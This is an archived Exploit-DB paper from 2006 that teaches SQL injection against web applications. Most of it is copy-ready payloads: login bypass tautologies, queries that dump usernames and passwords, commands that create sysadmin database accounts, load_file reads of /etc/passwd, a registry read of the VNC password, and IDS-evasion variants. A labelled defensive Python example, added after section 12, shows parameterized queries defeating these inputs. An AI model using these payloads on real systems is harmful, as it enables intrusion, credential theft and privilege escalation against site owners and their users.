SQL Injection Paper [BlackSecurity.org]

EDB-ID: 13227
CVE: N/A
Author: zeroday
Type: papers
Platform: Multiple
Published: 2006-03-28

    Sql Injection Paper                       
			         
     By zeroday.		         
        zeroday [ at ] blacksecurity.org  

	1.Introduction.
	2.Testing for vulnerabilities.
	3.Gathering Information.
	4.Data types.
	5.Grabbing Passwords.
	6.Create DB accounts.
	7.MySQL OS Interaction.
	8.Server name and config.
	9.Retrieving VNC password from registry.
	10.IDS Signature Evasion.
	11.mySQL Input Validation Circumvention using Char().
	12.IDS Signature Evasion using comments.
	13.Strings without quotes.

1. When a box only has port 80 open, it's almost certain the admin will patch his server,
so the best thing to turn to is web attacks. SQL injection is one of the most common web attacks.
You attack the web application (ASP, JSP, PHP, CGI, etc.) rather than the web server
or the services running on the OS.
SQL injection is a way to trick the application into running a query or command that is supplied as input via web pages.
Most websites take parameters from the user, like a username and password or even an email address.
They all use SQL queries.

2. First off, you should start with something simple.
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1-- 
These are simple ones to try; other ones are:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--

3.Gathering Information.
- ' or 1 in (select @@version)--
- ' union all select @@version--
Those will find the actual version of the database server, along with the OS/service pack.

4.Data types.

Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL
-->mysql.user
-->mysql.host
-->mysql.db

MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases

5.Grabbing passwords

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

6.Create DB accounts.

MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'

MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access
CREATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)
CREATE USER name WITH PASSWORD 'pass123'

Oracle
CREATE USER name IDENTIFIED BY pass123
        TEMPORARY TABLESPACE temp
         DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;

7.MySQL OS Interaction

- ' union select 1,load_file('/etc/passwd'),1,1,1;

8.Server name and config.

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--

9.Retrieving VNC password from registry.

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--

10.IDS Signature Evasion.
Evading ' OR 1=1 Signature

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumvention using Char().

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
Load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12.IDS Signature Evasion using comments.

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')
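
A defender's view of sections 2, 10 and 12, as an added example that is not part of the original paper: a signature written for the classic tautology misses the rewritten forms listed above, while a parameterized query treats every one of them as plain data. SQLite stands in for the database here, and the table, the account, the function names and the regex signature are all assumptions made for the illustration.

```python
import re
import sqlite3

# Constructed sample data: one account in an in-memory SQLite database.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (login TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def login_vulnerable(login, password):
    """Builds the query by string concatenation: input becomes SQL."""
    sql = ("SELECT COUNT(*) FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(login, password):
    """Bound parameters: input is only ever compared as a string value."""
    sql = "SELECT COUNT(*) FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone()[0] > 0

# Hypothetical IDS-style signature for the classic "OR 1=1" tautology.
NAIVE_SIGNATURE = re.compile(r"\bor\s+1\s*=\s*1", re.IGNORECASE)

def signature_hits(value):
    return bool(NAIVE_SIGNATURE.search(value))

# Inputs copied from the paper: section 2, then sections 10 and 12.
CLASSIC = "' or 1=1--"
VARIANTS = [
    "' OR 'unusual' = 'unusual'",
    "' OR 2 > 1",
    "' OR 2 BETWEEN 1 and 3",
    "'/**/OR/**/1/**/=/**/1",
]

def report():
    """Return (input, signature hit, parameterized login result) rows."""
    return [(v, signature_hits(v), login_parameterized(v, v))
            for v in [CLASSIC] + VARIANTS]

if __name__ == "__main__":
    print("concatenated query accepts classic input:",
          login_vulnerable(CLASSIC, CLASSIC))
    for value, hit, accepted in report():
        print(f"{value!r:32} signature={hit!s:5} parameterized_login={accepted}")
```

The signature fires only on the first input, yet the parameterized login rejects all five, which is why pattern matching is at best a supplementary control and query construction is the fix.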

13.Strings without quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)

Greets: kaneda, modem, wildcard, #black and pulltheplug.

# milw0rm.com [2006-03-28]